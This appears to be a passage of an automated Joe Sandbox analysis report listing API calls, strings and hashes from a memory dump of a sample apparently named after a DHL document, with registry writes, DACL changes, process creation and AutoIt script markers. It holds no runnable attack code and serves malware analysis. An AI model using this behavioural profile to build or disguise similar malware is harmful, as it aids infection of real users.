                                                                                        • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                                                                        • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090DF5
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090E29
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090E40
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00090E7A
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090E96
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090EAD
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090EB5
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00090EBC
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090EDD
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00090EE4
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090F13
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090F35
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090F47
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F6E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090F75
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F7E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090F85
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090F8E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090F95
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00090FA1
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090FA8
                                                                                        • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                                                                        • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                                                                        • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      APIs
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BC4BD
                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,000CCC08,00000000,?,00000000,?,?), ref: 000BC544
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 000BC5A4
                                                                                      • _wcslen.LIBCMT ref: 000BC5F4
                                                                                      • _wcslen.LIBCMT ref: 000BC66F
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 000BC6B2
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 000BC7C1
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 000BC84D
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BC881
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BC88E
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 000BC960
                                                                                      Similarity
                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                      • API String ID: 9721498-966354055
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 000C09C6
                                                                                      • _wcslen.LIBCMT ref: 000C0A01
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C0A54
                                                                                      • _wcslen.LIBCMT ref: 000C0A8A
                                                                                      • _wcslen.LIBCMT ref: 000C0B06
                                                                                      • _wcslen.LIBCMT ref: 000C0B81
                                                                                        • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                                                                        • Part of subcall function 00092BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00092BFA
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                      • API String ID: 1103490817-4258414348
                                                                                      • Opcode ID: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                                                                      • Instruction ID: 96468690354b633e399678357ec144fed286cec19ee39adced017b4ab1ca3574
                                                                                      • Opcode Fuzzy Hash: 356c416cede4caf64e51dab3dcacc0a404b697dec4c79aca65f56383ca70e2c6
                                                                                      • Instruction Fuzzy Hash: 03E18771208701DFCB24DF28C450A6EB7E1BF98314F50895CF89A9B2A2DB31ED45CB82

Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 1256254125-909552448
• Opcode ID: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
• Instruction ID: cc50837bd8fa4fe2cc758f67efca6daf17908fa968abcabef797570c03e6a215
• Opcode Fuzzy Hash: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
• Instruction Fuzzy Hash: 3971E33260412A8BEB20DE6CCD51DFF37D5ABA0758F250528FC56AB285EB35CD8493A1

APIs
• _wcslen.LIBCMT ref: 000C835A
• _wcslen.LIBCMT ref: 000C836E
• _wcslen.LIBCMT ref: 000C8391
• _wcslen.LIBCMT ref: 000C83B4
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000C83F2
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,000C5BF2), ref: 000C844E
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8487
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 000C84CA
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8501
• FreeLibrary.KERNEL32(?), ref: 000C850D
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000C851D
• DestroyIcon.USER32(?,?,?,?,?,000C5BF2), ref: 000C852C
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000C8549
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000C8555
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
• String ID: .dll$.exe$.icl
• API String ID: 799131459-1154884017
• Opcode ID: 3033e41d793cea387a0ba9e4b574ff0e6e7e984263a448e8d12e5ad43860c4e1
• Instruction ID: ceb61e8e9e86e896e5715c0995d8f867c6aa8afe864be9a70c69cf587b5ef2fd
• Opcode Fuzzy Hash: 3033e41d793cea387a0ba9e4b574ff0e6e7e984263a448e8d12e5ad43860c4e1
• Instruction Fuzzy Hash: 5D61D171940619BEEB18DF64CC45FFF77A8BB08711F10860AF915D60D1DBB4AA80DBA4

Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID:
• String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 0-1645009161
• Opcode ID: d8c69a7e42ab05de1d4e47dcb06873feded390959a60edf192432c3ad38ffd4c
• Instruction ID: 96503aedd970be57e21e7a00b84a75f541771ce2868925fed27a15c104ac1911
• Opcode Fuzzy Hash: d8c69a7e42ab05de1d4e47dcb06873feded390959a60edf192432c3ad38ffd4c
• Instruction Fuzzy Hash: 6C81D3B1A44605BBEB72AF60CC42FEF37A9AF15301F048025FD09AA193EBB4D915C795

APIs
• LoadIconW.USER32(00000063), ref: 00095A2E
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00095A40
• SetWindowTextW.USER32(?,?), ref: 00095A57
• GetDlgItem.USER32(?,000003EA), ref: 00095A6C
• SetWindowTextW.USER32(00000000,?), ref: 00095A72
• GetDlgItem.USER32(?,000003E9), ref: 00095A82
• SetWindowTextW.USER32(00000000,?), ref: 00095A88
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00095AA9
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00095AC3
• GetWindowRect.USER32(?,?), ref: 00095ACC
• _wcslen.LIBCMT ref: 00095B33
• SetWindowTextW.USER32(?,?), ref: 00095B6F
• GetDesktopWindow.USER32 ref: 00095B75
• GetWindowRect.USER32(00000000), ref: 00095B7C
• MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00095BD3
• GetClientRect.USER32(?,?), ref: 00095BE0
• PostMessageW.USER32(?,00000005,00000000,?), ref: 00095C05
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00095C2F
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
• String ID:
• API String ID: 895679908-0
• Opcode ID: 93669f4a4ab738afc8838e1fd914c57a77eaa2159f54256c3f6d0775abe0fc62
• Instruction ID: 1b58f1f282af208c50752b52f9613cb2fa7c6c0e59fb3bee1cbc0b8961292a0b
• Opcode Fuzzy Hash: 93669f4a4ab738afc8838e1fd914c57a77eaa2159f54256c3f6d0775abe0fc62
• Instruction Fuzzy Hash: 27719D31900B09AFEF21DFA9CE85EAEBBF5FF48705F104518E586A25A0D774E940DB10

APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 000AFE27
• LoadCursorW.USER32(00000000,00007F8A), ref: 000AFE32
• LoadCursorW.USER32(00000000,00007F00), ref: 000AFE3D
• LoadCursorW.USER32(00000000,00007F03), ref: 000AFE48
• LoadCursorW.USER32(00000000,00007F8B), ref: 000AFE53
• LoadCursorW.USER32(00000000,00007F01), ref: 000AFE5E
• LoadCursorW.USER32(00000000,00007F81), ref: 000AFE69
• LoadCursorW.USER32(00000000,00007F88), ref: 000AFE74
• LoadCursorW.USER32(00000000,00007F80), ref: 000AFE7F
• LoadCursorW.USER32(00000000,00007F86), ref: 000AFE8A
• LoadCursorW.USER32(00000000,00007F83), ref: 000AFE95
• LoadCursorW.USER32(00000000,00007F85), ref: 000AFEA0
• LoadCursorW.USER32(00000000,00007F82), ref: 000AFEAB
• LoadCursorW.USER32(00000000,00007F84), ref: 000AFEB6
• LoadCursorW.USER32(00000000,00007F04), ref: 000AFEC1
• LoadCursorW.USER32(00000000,00007F02), ref: 000AFECC
• GetCursorInfo.USER32(?), ref: 000AFEDC
• GetLastError.KERNEL32 ref: 000AFF1E
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Cursor$Load$ErrorInfoLast
• String ID:
• API String ID: 3215588206-0
• Opcode ID: c7319dd9e4f75ded928d1489d21e9faa73930442caf923dbdbba0fb4de391911
• Instruction ID: 5b7d263da5a2f3248efdc1c236e7754c0c57bae854aa9e1c8b6612308284e998
• Opcode Fuzzy Hash: c7319dd9e4f75ded928d1489d21e9faa73930442caf923dbdbba0fb4de391911
• Instruction Fuzzy Hash: 734153B0D0431A6EDB509FBA8C85C6EBFE8FF05354B50453AE11DEB281DB7899018F91

APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000500C6
  • Part of subcall function 000500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0010070C,00000FA0,F55D1209,?,?,?,?,000723B3,000000FF), ref: 0005011C
  • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000723B3,000000FF), ref: 00050127
  • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000723B3,000000FF), ref: 00050138
  • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0005014E
  • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0005015C
  • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0005016A
  • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00050195
  • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000501A0
• ___scrt_fastfail.LIBCMT ref: 000500E7
  • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
Strings
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 00050122
• kernel32.dll, xrefs: 00050133
• WakeAllConditionVariable, xrefs: 00050162
• InitializeConditionVariable, xrefs: 00050148
• SleepConditionVariableCS, xrefs: 00050154
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
• String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 66158676-1714406822
• Opcode ID: ff2c684f5de50e788797c777db8796feb70df2f52562a5ceee2ba67bbd61253a
• Instruction ID: 438259a4b90587379473f0c1f868b7e4cee06e2c7af3a0c031e7d4f76f997313
• Opcode Fuzzy Hash: ff2c684f5de50e788797c777db8796feb70df2f52562a5ceee2ba67bbd61253a
• Instruction Fuzzy Hash: 93214672A41B016BF7115B64EC06F7F33D5EB05B62F04013AFD46A66D2DFB89C048A9A

Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: _wcslen
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 176396367-1603158881
• Opcode ID: 548552615f32adccbf7a4d77a95364185242cd4f90822221bebc20ebe1ec2a9a
• Instruction ID: d9c113e501bed63093dcfc18b3b8c2fc00c6abb5e29ecc3af2bc6900faf9c858
• Opcode Fuzzy Hash: 548552615f32adccbf7a4d77a95364185242cd4f90822221bebc20ebe1ec2a9a
• Instruction Fuzzy Hash: C3E1D332A00516ABCF689FA8C8417FEBBF4BF44710F558129E556A7241DB30AF85AF90
APIs
• CharLowerBuffW.USER32(00000000,00000000,000CCC08), ref: 000A4527
• _wcslen.LIBCMT ref: 000A453B
• _wcslen.LIBCMT ref: 000A4599
• _wcslen.LIBCMT ref: 000A45F4
• _wcslen.LIBCMT ref: 000A463F
• _wcslen.LIBCMT ref: 000A46A7
  • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
• GetDriveTypeW.KERNEL32(?,000F6BF0,00000061), ref: 000A4743
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: _wcslen$BuffCharDriveLowerType
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2055661098-1000479233
• Opcode ID: adddfc66d5afbd216184b1093025e83866136dbb2488ab5875b665e6142caa43
• Instruction ID: d2a1812bbd474e24972d53bb10db3e7d02090945e7a4ff1ccd70960f7ef4f7e9
• Opcode Fuzzy Hash: adddfc66d5afbd216184b1093025e83866136dbb2488ab5875b665e6142caa43
• Instruction Fuzzy Hash: 10B113396083029FC720DF68C891ABEB7E5AFE6724F50491DF596C7292D7B0D884CB52
APIs
• DestroyWindow.USER32(?,?), ref: 000C6DEB
  • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000C6E5F
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000C6E81
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6E94
• DestroyWindow.USER32(?), ref: 000C6EB5
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00030000,00000000), ref: 000C6EE4
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6EFD
• GetDesktopWindow.USER32 ref: 000C6F16
• GetWindowRect.USER32(00000000), ref: 000C6F1D
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C6F35
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000C6F4D
  • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$p]$tooltips_class32
• API String ID: 2429346358-3849672097
• Opcode ID: 91d13ae90adc0093fd39a620bee8aee1170fd3025f0364d5873497be6267cfd6
• Instruction ID: b017b32c78e96bad3adf4aecd18c57a2643719f05fcddfc59068efa8916e4db6
• Opcode Fuzzy Hash: 91d13ae90adc0093fd39a620bee8aee1170fd3025f0364d5873497be6267cfd6
• Instruction Fuzzy Hash: 55716774104244AFEB21CF18DC48FAABBF9FF89304F04042EF98A87261C776A946DB11
APIs
  • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
• DragQueryPoint.SHELL32(?,?), ref: 000C9147
  • Part of subcall function 000C7674: ClientToScreen.USER32(?,?), ref: 000C769A
  • Part of subcall function 000C7674: GetWindowRect.USER32(?,?), ref: 000C7710
  • Part of subcall function 000C7674: PtInRect.USER32(?,?,000C8B89), ref: 000C7720
• SendMessageW.USER32(?,000000B0,?,?), ref: 000C91B0
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000C91BB
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000C91DE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 000C9225
• SendMessageW.USER32(?,000000B0,?,?), ref: 000C923E
• SendMessageW.USER32(?,000000B1,?,?), ref: 000C9255
• SendMessageW.USER32(?,000000B1,?,?), ref: 000C9277
• DragFinish.SHELL32(?), ref: 000C927E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000C9371
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p]
• API String ID: 221274066-2210861112
• Opcode ID: 3c4183e1184e2b86dc3fd9c54495973467a131d37223a7c5dd71cd7ab9f230ae
• Instruction ID: 52f470cfe74db63665b0c585fe9429c552b44cc340035f33e815f0eee2c589a2
• Opcode Fuzzy Hash: 3c4183e1184e2b86dc3fd9c54495973467a131d37223a7c5dd71cd7ab9f230ae
• Instruction Fuzzy Hash: 22617A71108301AFE701DF64DC89EAFBBE8FF89750F00092EF595921A1DB709A49CB52
APIs
• _wcslen.LIBCMT ref: 000BB198
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1B0
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1D4
• _wcslen.LIBCMT ref: 000BB200
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB214
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB236
• _wcslen.LIBCMT ref: 000BB332
  • Part of subcall function 000A05A7: GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
• _wcslen.LIBCMT ref: 000BB34B
• _wcslen.LIBCMT ref: 000BB366
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BB3B6
• GetLastError.KERNEL32(00000000), ref: 000BB407
• CloseHandle.KERNEL32(?), ref: 000BB439
• CloseHandle.KERNEL32(00000000), ref: 000BB44A
• CloseHandle.KERNEL32(00000000), ref: 000BB45C
• CloseHandle.KERNEL32(00000000), ref: 000BB46E
• CloseHandle.KERNEL32(?), ref: 000BB4E3
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
• String ID:
• API String ID: 2178637699-0
• Opcode ID: 1dacb47b8c164f48548880120139258a73b8764f99a456f6d4b926e17ad0fd4d
• Instruction ID: 135386c8dc5a5162f8c728620feaeed5f677bc5b09857b3296003816d7d3a34d
• Opcode Fuzzy Hash: 1dacb47b8c164f48548880120139258a73b8764f99a456f6d4b926e17ad0fd4d
• Instruction Fuzzy Hash: CAF19C716083009FD725EF24C891BAEBBE5AF85714F14895DF8998B2A2CB71EC44CB52
APIs
• GetMenuItemCount.USER32(00101990), ref: 00072F8D
• GetMenuItemCount.USER32(00101990), ref: 0007303D
• GetCursorPos.USER32(?), ref: 00073081
• SetForegroundWindow.USER32(00000000), ref: 0007308A
• TrackPopupMenuEx.USER32(00101990,00000000,?,00000000,00000000,00000000), ref: 0007309D
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000730A9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
